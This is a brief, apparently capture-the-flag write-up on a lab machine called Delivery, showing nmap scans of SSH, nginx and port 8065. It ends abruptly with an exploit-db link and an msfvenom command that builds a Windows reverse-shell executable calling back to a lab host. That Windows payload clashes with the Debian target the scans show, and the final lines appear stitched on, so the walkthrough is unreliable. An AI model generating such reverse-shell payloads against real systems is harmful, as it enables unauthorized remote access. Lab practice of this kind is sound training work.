I start off with an nmap scan:
└─# nmap -sC -sV -A 10.10.10.222
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
And a full port scan reveals a third open port:
└─# nmap -p- --min-rate 10000 10.10.10.222
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Visiting the website on port 80, I note a redirect to http://helpdesk.delivery.htb/
https://www.exploit-db.com/exploits/45169
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.31 LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
